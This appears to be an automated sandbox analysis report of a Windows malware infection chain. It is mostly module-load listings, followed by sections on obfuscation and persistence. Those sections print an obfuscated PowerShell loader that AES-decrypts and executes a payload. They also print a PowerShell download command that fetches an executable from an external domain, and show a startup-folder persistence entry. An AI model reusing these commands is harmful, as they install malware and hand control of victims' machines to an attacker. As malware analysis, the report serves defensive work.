Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: n5Szx8qsFB.lnkLNK file: ..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764422929.0000021D206C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764242109.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763193876.0000021D2464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763663634.0000021D24632000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762308911.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D246C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D24652000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763886260.0000021D26241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: ghep2412_2[1].6.dr Static PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe Code function: 15_2_00007FF7ADC06D64 LoadLibraryA,GetProcAddress,15_2_00007FF7ADC06D64
Source: ghep2412_2[1].6.dr Static PE information: real checksum: 0x20826 should be: 0x72559
Source: ghep2412_2[1].6.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4B3E00BD pushad ; iretd 5_2_00007FFB4B3E00C1
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe Code function: 15_2_00007FF7ADC378FD push rdi; ret 15_2_00007FF7ADC37904
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe Code function: 15_2_00007FF7ADC37399 push rdi; ret 15_2_00007FF7ADC373A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFB49AA1C65 push edi; iretd 21_2_00007FFB49AA1C93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFB49AA1C0C push edi; iretd 21_2_00007FFB49AA1C93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFB49AA23E1 pushad ; retf 21_2_00007FFB49AA23F1
Source: C:\Users\Public\Guard.exe Code function: 23_2_00B78B75 push ecx; ret 23_2_00B78B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00818B75 push ecx; ret 27_2_00818B88

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\Public\Guard.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe Code function: 15_2_00007FF7ADC24514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7ADC24514
Source: C:\Users\Public\Guard.exe Code function: 23_2_00BD59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_00BD59B3
